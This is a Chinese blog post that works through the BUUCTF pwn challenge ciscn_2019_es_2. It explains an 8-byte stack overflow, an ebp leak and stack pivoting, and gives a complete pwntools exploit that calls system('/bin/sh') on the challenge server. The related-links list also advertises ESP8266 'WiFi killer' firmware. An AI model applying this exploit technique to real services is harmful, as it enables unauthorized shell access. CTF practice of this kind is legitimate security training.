BUUCTF-Pwn-ciscn_2019_es_2

最新推荐文章于 2023-01-16 21:34:44 发布
最新推荐文章于 2023-01-16 21:34:44 发布
阅读量420 收藏
点赞数
分类专栏: CTF Pwn 文章标签: 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46035101/article/details/123750184
版权
CTF 同时被 2 个专栏收录
29 篇文章 0 订阅
订阅专栏
Pwn
21 篇文章 0 订阅
订阅专栏

题目截图
在这里插入图片描述
例行检查
在这里插入图片描述
同IDA打开查看字符串,找到system函数和一个与flag相关的字符串
在这里插入图片描述
利用交叉引用找到Hack函数,其中调用了system函数,但是参数并不能让我们getshell或者得到flag
在这里插入图片描述
继续查看主函数
在这里插入图片描述
查看函数vul(),存在栈溢出,但是只溢出了8个字节,只能覆盖ebp和ret,可以考虑使用栈迁移
在这里插入图片描述
函数vul()中有两次输入和两次输出,可以利用第一次输入和输出泄露ebp的值、计算栈顶地址、布置栈,然后再利用第二次输入覆盖ebp和ret进行栈迁移,再次回到栈顶,执行我们布置好的rop链
使用动调计算上一个栈的大小为0x10,保存的为上一个栈的ebp,所以利用栈的栈顶地址为泄露ebp-0x10-0x28
在这里插入图片描述

exp

from pwn import *
path='/home/lhb/桌面/ciscn_2019_es_2'
elf=ELF(path)
p=remote('node4.buuoj.cn', 26511)
system_plt=elf.plt['system']
leave_ret=0x80485fd
payload=b'a'*(0x27)
p.recv()
p.sendline(payload)

addr=u32(p.recvuntil(p32(0x804862a))[-8:-4])

payload=p32(addr)
payload+=p32(system_plt)+p32(0)+p32(addr-0x28)
payload+=b'/bin/sh\0'+b'a'*(0x28-16-8)
payload+=p32(addr-0x38)+p32(leave_ret)
p.sendline(payload)

p.interactive()
餐桌上的猫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF]PWN——ciscn_2019_es_2
mcmuyanga的博客
10-27 2249
ciscn_2019_es_2 附件 步骤: 例行检查,32位程序,开启了nx保护 32位ida载入,shif+f12查看程序里的字符串,这边的“echo flag” 是个迷惑性的字符串,它只是输出了flag这4个字符,但是程序里有system函数,到时候这个函数可以直接拿来使用 system_addr=0x80048400 main函数 程序主体在vul函数里 读入0x30字节数据给s,s大小是0x28,只能溢出0x8字节,覆盖到ret,没法构造太长的rop,但是这边可以给s写入
[PWN] BUUCTF ciscn_2019_es_2
空城惜梦的博客
06-20 1216
[PWN] BUUCTF ciscn_2019_es_2解题分析漏洞利用payload解析程序执行过程图参考: 解题分析 按照惯例checksec一下,开了NX与RELRO 运行程序,查看逻辑,两次input,并且回显Hello,input 32位IDA打开,查看关键函数vul(),发现两次read往s里写内容,read可写0x30个字节,但s的缓冲区只有0x28个字节,所以这里存在着栈溢出,若有backdoor直接获得flag的话,可直接构造 payload=0x28*‘a’+ebp+backdoo
BUUCTFciscn_2019_es_2
m0_51251108的博客
12-28 267
BUUCTFciscn_2019_es_2 看下程序 有两处read可以溢出,但只能溢出刚好盖到ebp和ret 由于memset只清了0x20,所以可以泄露出ebp 有system函数,但参数不对 思路:运用栈迁移,迁移到我们写入的前面的部分,写rop链,就可以开shell了 由于需要跳转到我们写入的前面的部分需要知道它的地址,地址=ebp地址-偏移。 用gdb-peda调试,断点设在vul函数,一步步跟进,可以输入aaaa 然后searchmem aaaa stack 来查看栈状态 (这图可能
BUUCTF ciscn_2019_es_2
红叶的博客
11-02 293
栈迁移。
buuctf ciscn_2019_es_2
carol2358的博客
04-24 628
通过这道题总算学会用gdb来调试stack了 一道栈迁移的题目,printf函数可以泄露出bp的地址 有system函数,但是没有/bin/sh,所以我采用了往stack里写入binsh,然后通过泄露出来的bp算出偏移来指向binsh的位置,从而getshell 调试的时候看泄露出的栈地址和aaaa的偏移,和binsh的偏移,栈上的地址是\xff开头 exp: from pwn import ...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
ciscn_2019_es_2【BUUCTF
qq_41696518的博客
09-02 833
与往常溢出不同的是,该溢出仅仅只能溢出8(0x30-0x28)字节的数据,恰好就是覆盖ebp和ret地址数据,并且存在两处溢出漏洞。因此可以用read函数将system(“/bin/sh”)读到当前栈中,并返回让其执行该函数即可。这里有两个问题,1.system(“/bin/sh”)存储地址如何得知 2. 如何返回该system地址执行函数。
[栈迁移][BUUCTF][PWN] ciscn_2019_es_2
m0_50819561的博客
09-25 387
前置知识: 栈迁移概念:当存在栈溢出且可溢出长度不足以容纳 payload 时,可采用栈迁移。一般这种情况下,溢出仅能覆盖 ebp 、 eip 。因为原来的栈空间不足,所以要构建一个新的栈空间放下 payload ,因此称为栈迁移。 栈迁移原理:栈执行命令是从esp指向的位置想ebp指向的位置执行。正常情况退栈的操作是:esp指向ebp指向位置,ebp指向ebp里的内容所指向的位置。当遇见leave|ret命令的时候,相当于执行mov esp ebp; pop ebp; ret;作用就是将ebp指向的位置给
BUUCTF栈迁移ciscn_2019_es_2
Rt1Text的博客
04-09 997
1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
BUUCTFPWNciscn_2019_es_2 栈迁移 栈劫持
m0_55368674的博客
01-16 619
BUUCTFPWNciscn_2019_es_2题解
ciscn_2019_es_2
、moddemod
06-23 851
简单分析:两次read都往同一个地方填数据(s栈变量的位置),可输入0x30大小,s离ebp距离0x28,可通过printf泄露压入的上一个栈帧的ebp,之后通过第二次read构造leave控制esp from pwn import * def debug_pause(): log.info(proc.pidof(p)) pause() context(log_level='debug') proc_name = './ciscn_2019_es_2' p = process(proc_name.
[BUUCTF-pwn]——ciscn_2019_es_2(内涵peak小知识)
Y_peak的博客
02-16 1183
[BUUCTF-pwn]——ciscn_2019_es_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_es_2 这是一道栈劫持的题,第一次写这种题的题解写的详细一点。 栈劫持 or 栈迁移 栈劫持也可以称为栈迁移,用来解决栈本身可以利用的空间不够用,一般是溢出空间不够用,没办法有效构造rop链。这个时候我们可以通过劫持ebp的方式,利用leave 和 ret两个汇编指令来做到栈劫持(栈迁移)。 leave 等价于 mov ebp, esp; pop
BUUCTF ciscn_2019_es_1
doudoudedi
01-04 885
我本地直接用fastbin attack直接能打通但是远程似乎有问题 思路 首先申请一个smallbin大小的trunk然后释放打印得到libc基址,然后double free打fastbin attack之后写到libc去__malloc_hook写入one_gadget再次add获取shell 以下为ubuntu16的环境下本地也就是libc-2.23 exp: #!/usr/bin/pyth...
pwnciscn_2019_es_2
Nothing
12-24 2761
例行检查 分析程序,程序存在system函数,但是不能直接得到flag。 vul函数中存在栈溢出,但只能溢出8个字节,只能盖到ebp和ret。vul函数中有两次read和printf第一次可以用来泄露ebp,得到栈地址,然后进行栈迁移。然后利用main函数返回时将控制流转到system。 根据一下汇编代码布置栈数据。 from pwn import * #io=process('ciscn...
ciscn_2019_n_5
、moddemod
06-17 301
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level = 'debug') proc_name = './ciscn_2019_n_5' # p = process(proc_name) p = remote('node3.buuoj.cn', 28451) elf = ELF(proc_name) p.sendline('a'.encode()).
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值